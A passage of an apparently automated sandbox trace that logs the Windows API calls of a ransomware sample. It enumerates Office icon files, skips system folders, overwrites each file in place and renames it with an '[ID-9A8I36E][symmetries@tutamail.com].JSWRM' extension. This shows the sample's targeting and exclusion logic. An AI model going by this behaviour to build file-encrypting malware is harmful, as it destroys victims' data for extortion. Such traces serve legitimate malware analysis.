lpOverlapped=0x0 | out: lpBuffer=0x278330*, lpNumberOfBytesWritten=0x345e530*=0xd60, lpOverlapped=0x0) returned 1 [0131.966] CloseHandle (hObject=0x314) returned 1 [0131.967] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\Groove\\ToolIcons\\OnLineBusy.ico" (normalized: "c:\\program files\\microsoft office\\root\\office16\\groove\\toolicons\\onlinebusy.ico"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\Groove\\ToolIcons\\OnLineBusy.ico.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\office16\\groove\\toolicons\\onlinebusy.ico.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0131.968] FindNextFileW (in: hFindFile=0x231ac0, lpFindFileData=0x345e5c0 | out: lpFindFileData=0x345e5c0*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xf263c7d5, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xf263c7d5, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0xf2f2d53e, ftLastWriteTime.dwHighDateTime=0x1d327e7, nFileSizeHigh=0x0, nFileSizeLow=0xd6e, dwReserved0=0x60002, dwReserved1=0x225316, cFileName="OnLineIdle.ico", cAlternateFileName="ONLINE~1.ICO")) returned 1 [0131.968] lstrcmpiW (lpString1="OnLineIdle.ico", lpString2=".") returned 1 [0131.968] lstrcmpiW (lpString1="OnLineIdle.ico", lpString2="..") returned 1 [0131.968] lstrcmpiW (lpString1="OnLineIdle.ico", lpString2="...") returned 1 [0131.968] lstrcmpiW (lpString1="OnLineIdle.ico", lpString2="windows") returned -1 [0131.968] lstrcmpiW (lpString1="OnLineIdle.ico", lpString2="recovery") returned -1 [0131.968] lstrcmpiW (lpString1="OnLineIdle.ico", lpString2="perflogs") returned -1 [0131.968] lstrcmpiW (lpString1="OnLineIdle.ico", lpString2="documents and settings") returned 1 [0131.968] lstrcmpiW (lpString1="OnLineIdle.ico", lpString2="$RECYCLE.BIN") returned 1 [0131.968] lstrcmpiW (lpString1="OnLineIdle.ico", lpString2="system volume information") returned -1 [0131.968] lstrcmpiW (lpString1="OnLineIdle.ico", lpString2="msocache") returned 1 [0131.968] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="OnLineIdle.ico", cchWideChar=14, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 14 [0131.968] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="OnLineIdle.ico", cchWideChar=14, lpMultiByteStr=0x345e870, cbMultiByte=14, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="OnLineIdle.ico", lpUsedDefaultChar=0x0) returned 14 [0131.968] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="OnLineIdle.ico", cchWideChar=14, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 14 [0131.968] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="OnLineIdle.ico", cchWideChar=14, lpMultiByteStr=0x345e840, cbMultiByte=14, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="OnLineIdle.ico", lpUsedDefaultChar=0x0) returned 14 [0131.968] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0131.968] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e594, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0131.968] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\Groove\\ToolIcons\\OnLineIdle.ico" (normalized: "c:\\program files\\microsoft office\\root\\office16\\groove\\toolicons\\onlineidle.ico"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x314 [0131.970] GetFileSizeEx (in: hFile=0x314, lpFileSize=0x345e528 | out: lpFileSize=0x345e528*=3438) returned 1 [0131.970] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0131.970] ReadFile (in: hFile=0x314, lpBuffer=0x27b348, nNumberOfBytesToRead=0xd60, lpNumberOfBytesRead=0x345e534, lpOverlapped=0x0 | out: lpBuffer=0x27b348*, lpNumberOfBytesRead=0x345e534*=0xd60, lpOverlapped=0x0) returned 1 [0131.972] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0131.972] WriteFile (in: hFile=0x314, lpBuffer=0x27b348*, nNumberOfBytesToWrite=0xd60, lpNumberOfBytesWritten=0x345e530, lpOverlapped=0x0 | out: lpBuffer=0x27b348*, lpNumberOfBytesWritten=0x345e530*=0xd60, lpOverlapped=0x0) returned 1 [0131.972] CloseHandle (hObject=0x314) returned 1 [0131.972] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\Groove\\ToolIcons\\OnLineIdle.ico" (normalized: "c:\\program files\\microsoft office\\root\\office16\\groove\\toolicons\\onlineidle.ico"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\Groove\\ToolIcons\\OnLineIdle.ico.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\office16\\groove\\toolicons\\onlineidle.ico.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0131.973] FindNextFileW (in: hFindFile=0x231ac0, lpFindFileData=0x345e5c0 | out: lpFindFileData=0x345e5c0*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x765018, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x765018, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x78b299, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x13e, dwReserved0=0x60002, dwReserved1=0x225316, cFileName="OutDomain.ico", cAlternateFileName="OUTDOM~1.ICO")) returned 1 [0131.973] lstrcmpiW (lpString1="OutDomain.ico", lpString2=".") returned 1 [0131.973] lstrcmpiW (lpString1="OutDomain.ico", lpString2="..") returned 1 [0131.973] lstrcmpiW (lpString1="OutDomain.ico", lpString2="...") returned 1 [0131.973] lstrcmpiW (lpString1="OutDomain.ico", lpString2="windows") returned -1 [0131.973] lstrcmpiW (lpString1="OutDomain.ico", lpString2="recovery") returned -1 [0131.973] lstrcmpiW (lpString1="OutDomain.ico", lpString2="perflogs") returned -1 [0131.973] lstrcmpiW (lpString1="OutDomain.ico", lpString2="documents and settings") returned 1 [0131.973] lstrcmpiW (lpString1="OutDomain.ico", lpString2="$RECYCLE.BIN") returned 1 [0131.973] lstrcmpiW (lpString1="OutDomain.ico", lpString2="system volume information") returned -1 [0131.973] lstrcmpiW (lpString1="OutDomain.ico", lpString2="msocache") returned 1 [0131.974] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="OutDomain.ico", cchWideChar=13, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0131.974] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="OutDomain.ico", cchWideChar=13, lpMultiByteStr=0x345e870, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="OutDomain.ico", lpUsedDefaultChar=0x0) returned 13 [0131.974] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="OutDomain.ico", cchWideChar=13, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0131.974] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="OutDomain.ico", cchWideChar=13, lpMultiByteStr=0x345e840, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="OutDomain.ico", lpUsedDefaultChar=0x0) returned 13 [0131.974] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0131.974] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e594, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0131.974] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\Groove\\ToolIcons\\OutDomain.ico" (normalized: "c:\\program files\\microsoft office\\root\\office16\\groove\\toolicons\\outdomain.ico"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x314 [0131.974] GetFileSizeEx (in: hFile=0x314, lpFileSize=0x345e528 | out: lpFileSize=0x345e528*=318) returned 1 [0131.974] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0131.975] ReadFile (in: hFile=0x314, lpBuffer=0x244be8, nNumberOfBytesToRead=0x130, lpNumberOfBytesRead=0x345e534, lpOverlapped=0x0 | out: lpBuffer=0x244be8*, lpNumberOfBytesRead=0x345e534*=0x130, lpOverlapped=0x0) returned 1 [0131.975] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0131.975] WriteFile (in: hFile=0x314, lpBuffer=0x244be8*, nNumberOfBytesToWrite=0x130, lpNumberOfBytesWritten=0x345e530, lpOverlapped=0x0 | out: lpBuffer=0x244be8*, lpNumberOfBytesWritten=0x345e530*=0x130, lpOverlapped=0x0) returned 1 [0131.976] CloseHandle (hObject=0x314) returned 1 [0131.976] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\Groove\\ToolIcons\\OutDomain.ico" (normalized: "c:\\program files\\microsoft office\\root\\office16\\groove\\toolicons\\outdomain.ico"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\Groove\\ToolIcons\\OutDomain.ico.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\office16\\groove\\toolicons\\outdomain.ico.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0131.995] FindNextFileW (in: hFindFile=0x231ac0, lpFindFileData=0x345e5c0 | out: lpFindFileData=0x345e5c0*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x4c63313, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x4c63313, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x4c63313, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x6b6, dwReserved0=0x60002, dwReserved1=0x225316, cFileName="OUTGOING.ICO", cAlternateFileName="")) returned 1 [0131.995] lstrcmpiW (lpString1="OUTGOING.ICO", lpString2=".") returned 1 [0131.995] lstrcmpiW (lpString1="OUTGOING.ICO", lpString2="..") returned 1 [0131.995] lstrcmpiW (lpString1="OUTGOING.ICO", lpString2="...") returned 1 [0131.995] lstrcmpiW (lpString1="OUTGOING.ICO", lpString2="windows") returned -1 [0131.995] lstrcmpiW (lpString1="OUTGOING.ICO", lpString2="recovery") returned -1 [0131.995] lstrcmpiW (lpString1="OUTGOING.ICO", lpString2="perflogs") returned -1 [0131.995] lstrcmpiW (lpString1="OUTGOING.ICO", lpString2="documents and settings") returned 1 [0131.995] lstrcmpiW (lpString1="OUTGOING.ICO", lpString2="$RECYCLE.BIN") returned 1 [0131.995] lstrcmpiW (lpString1="OUTGOING.ICO", lpString2="system volume information") returned -1 [0131.995] lstrcmpiW (lpString1="OUTGOING.ICO", lpString2="msocache") returned 1 [0131.995] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="OUTGOING.ICO", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0131.995] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="OUTGOING.ICO", cchWideChar=12, lpMultiByteStr=0x345e870, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="OUTGOING.ICO", lpUsedDefaultChar=0x0) returned 12 [0131.995] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="OUTGOING.ICO", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0131.995] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="OUTGOING.ICO", cchWideChar=12, lpMultiByteStr=0x345e840, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="OUTGOING.ICO", lpUsedDefaultChar=0x0) returned 12 [0131.996] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0131.996] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e594, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0131.996] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\Groove\\ToolIcons\\OUTGOING.ICO" (normalized: "c:\\program files\\microsoft office\\root\\office16\\groove\\toolicons\\outgoing.ico"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x314 [0131.996] GetFileSizeEx (in: hFile=0x314, lpFileSize=0x345e528 | out: lpFileSize=0x345e528*=1718) returned 1 [0131.996] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0131.996] ReadFile (in: hFile=0x314, lpBuffer=0x2323e8, nNumberOfBytesToRead=0x6b0, lpNumberOfBytesRead=0x345e534, lpOverlapped=0x0 | out: lpBuffer=0x2323e8*, lpNumberOfBytesRead=0x345e534*=0x6b0, lpOverlapped=0x0) returned 1 [0131.998] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0131.998] WriteFile (in: hFile=0x314, lpBuffer=0x2323e8*, nNumberOfBytesToWrite=0x6b0, lpNumberOfBytesWritten=0x345e530, lpOverlapped=0x0 | out: lpBuffer=0x2323e8*, lpNumberOfBytesWritten=0x345e530*=0x6b0, lpOverlapped=0x0) returned 1 [0131.998] CloseHandle (hObject=0x314) returned 1 [0131.998] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\Groove\\ToolIcons\\OUTGOING.ICO" (normalized: "c:\\program files\\microsoft office\\root\\office16\\groove\\toolicons\\outgoing.ico"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\Groove\\ToolIcons\\OUTGOING.ICO.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\office16\\groove\\toolicons\\outgoing.ico.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0131.999] FindNextFileW (in: hFindFile=0x231ac0, lpFindFileData=0x345e5c0 | out: lpFindFileData=0x345e5c0*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x6e5cc4e, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x6e5cc4e, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x6e5cc4e, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x13e, dwReserved0=0x60002, dwReserved1=0x225316, cFileName="OutSyncPC.ico", cAlternateFileName="OUTSYN~1.ICO")) returned 1 [0131.999] lstrcmpiW (lpString1="OutSyncPC.ico", lpString2=".") returned 1 [0131.999] lstrcmpiW (lpString1="OutSyncPC.ico", lpString2="..") returned 1 [0131.999] lstrcmpiW (lpString1="OutSyncPC.ico", lpString2="...") returned 1 [0131.999] lstrcmpiW (lpString1="OutSyncPC.ico", lpString2="windows") returned -1 [0131.999] lstrcmpiW (lpString1="OutSyncPC.ico", lpString2="recovery") returned -1 [0131.999] lstrcmpiW (lpString1="OutSyncPC.ico", lpString2="perflogs") returned -1 [0131.999] lstrcmpiW (lpString1="OutSyncPC.ico", lpString2="documents and settings") returned 1 [0132.000] lstrcmpiW (lpString1="OutSyncPC.ico", lpString2="$RECYCLE.BIN") returned 1 [0132.000] lstrcmpiW (lpString1="OutSyncPC.ico", lpString2="system volume information") returned -1 [0132.000] lstrcmpiW (lpString1="OutSyncPC.ico", lpString2="msocache") returned 1 [0132.000] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="OutSyncPC.ico", cchWideChar=13, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0132.000] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="OutSyncPC.ico", cchWideChar=13, lpMultiByteStr=0x345e870, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="OutSyncPC.ico", lpUsedDefaultChar=0x0) returned 13 [0132.000] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="OutSyncPC.ico", cchWideChar=13, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0132.000] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="OutSyncPC.ico", cchWideChar=13, lpMultiByteStr=0x345e840, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="OutSyncPC.ico", lpUsedDefaultChar=0x0) returned 13 [0132.000] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0132.000] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e594, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0132.000] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\Groove\\ToolIcons\\OutSyncPC.ico" (normalized: "c:\\program files\\microsoft office\\root\\office16\\groove\\toolicons\\outsyncpc.ico"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x314 [0132.012] GetFileSizeEx (in: hFile=0x314, lpFileSize=0x345e528 | out: lpFileSize=0x345e528*=318) returned 1 [0132.012] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0132.012] ReadFile (in: hFile=0x314, lpBuffer=0x244978, nNumberOfBytesToRead=0x130, lpNumberOfBytesRead=0x345e534, lpOverlapped=0x0 | out: lpBuffer=0x244978*, lpNumberOfBytesRead=0x345e534*=0x130, lpOverlapped=0x0) returned 1 [0132.013] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0132.013] WriteFile (in: hFile=0x314, lpBuffer=0x244978*, nNumberOfBytesToWrite=0x130, lpNumberOfBytesWritten=0x345e530, lpOverlapped=0x0 | out: lpBuffer=0x244978*, lpNumberOfBytesWritten=0x345e530*=0x130, lpOverlapped=0x0) returned 1 [0132.013] CloseHandle (hObject=0x314) returned 1 [0132.014] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\Groove\\ToolIcons\\OutSyncPC.ico" (normalized: "c:\\program files\\microsoft office\\root\\office16\\groove\\toolicons\\outsyncpc.ico"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\Groove\\ToolIcons\\OutSyncPC.ico.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\office16\\groove\\toolicons\\outsyncpc.ico.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0132.014] FindNextFileW (in: hFindFile=0x231ac0, lpFindFileData=0x345e5c0 | out: lpFindFileData=0x345e5c0*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x7fd9ab, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x7fd9ab, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x7fd9ab, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x6b6, dwReserved0=0x60002, dwReserved1=0x225316, cFileName="PersonalContact.ico", cAlternateFileName="PERSON~1.ICO")) returned 1 [0132.014] lstrcmpiW (lpString1="PersonalContact.ico", lpString2=".") returned 1 [0132.014] lstrcmpiW (lpString1="PersonalContact.ico", lpString2="..") returned 1 [0132.015] lstrcmpiW (lpString1="PersonalContact.ico", lpString2="...") returned 1 [0132.015] lstrcmpiW (lpString1="PersonalContact.ico", lpString2="windows") returned -1 [0132.015] lstrcmpiW (lpString1="PersonalContact.ico", lpString2="recovery") returned -1 [0132.015] lstrcmpiW (lpString1="PersonalContact.ico", lpString2="perflogs") returned 1 [0132.015] lstrcmpiW (lpString1="PersonalContact.ico", lpString2="documents and settings") returned 1 [0132.015] lstrcmpiW (lpString1="PersonalContact.ico", lpString2="$RECYCLE.BIN") returned 1 [0132.015] lstrcmpiW (lpString1="PersonalContact.ico", lpString2="system volume information") returned -1 [0132.015] lstrcmpiW (lpString1="PersonalContact.ico", lpString2="msocache") returned 1 [0132.015] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="PersonalContact.ico", cchWideChar=19, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 19 [0132.015] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="PersonalContact.ico", cchWideChar=19, lpMultiByteStr=0x241330, cbMultiByte=19, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="PersonalContact.ico", lpUsedDefaultChar=0x0) returned 19 [0132.015] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="PersonalContact.ico", cchWideChar=19, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 19 [0132.015] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="PersonalContact.ico", cchWideChar=19, lpMultiByteStr=0x240ef8, cbMultiByte=19, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="PersonalContact.ico", lpUsedDefaultChar=0x0) returned 19 [0132.015] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0132.015] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e594, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0132.015] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\Groove\\ToolIcons\\PersonalContact.ico" (normalized: "c:\\program files\\microsoft office\\root\\office16\\groove\\toolicons\\personalcontact.ico"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x314 [0132.016] GetFileSizeEx (in: hFile=0x314, lpFileSize=0x345e528 | out: lpFileSize=0x345e528*=1718) returned 1 [0132.016] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0132.016] ReadFile (in: hFile=0x314, lpBuffer=0x2323e8, nNumberOfBytesToRead=0x6b0, lpNumberOfBytesRead=0x345e534, lpOverlapped=0x0 | out: lpBuffer=0x2323e8*, lpNumberOfBytesRead=0x345e534*=0x6b0, lpOverlapped=0x0) returned 1 [0132.018] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0132.018] WriteFile (in: hFile=0x314, lpBuffer=0x2323e8*, nNumberOfBytesToWrite=0x6b0, lpNumberOfBytesWritten=0x345e530, lpOverlapped=0x0 | out: lpBuffer=0x2323e8*, lpNumberOfBytesWritten=0x345e530*=0x6b0, lpOverlapped=0x0) returned 1 [0132.018] CloseHandle (hObject=0x314) returned 1 [0132.018] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\Groove\\ToolIcons\\PersonalContact.ico" (normalized: "c:\\program files\\microsoft office\\root\\office16\\groove\\toolicons\\personalcontact.ico"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\Groove\\ToolIcons\\PersonalContact.ico.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\office16\\groove\\toolicons\\personalcontact.ico.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0132.019] FindNextFileW (in: hFindFile=0x231ac0, lpFindFileData=0x345e5c0 | out: lpFindFileData=0x345e5c0*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xffd6924a, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xffd6924a, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0xffd6924a, ftLastWriteTime.dwHighDateTime=0x1d327e7, nFileSizeHigh=0x0, nFileSizeLow=0xb2e, dwReserved0=0x60002, dwReserved1=0x225316, cFileName="SessionMember.ico", cAlternateFileName="SESSIO~1.ICO")) returned 1 [0132.019] lstrcmpiW (lpString1="SessionMember.ico", lpString2=".") returned 1 [0132.019] lstrcmpiW (lpString1="SessionMember.ico", lpString2="..") returned 1 [0132.019] lstrcmpiW (lpString1="SessionMember.ico", lpString2="...") returned 1 [0132.019] lstrcmpiW (lpString1="SessionMember.ico", lpString2="windows") returned -1 [0132.019] lstrcmpiW (lpString1="SessionMember.ico", lpString2="recovery") returned 1 [0132.019] 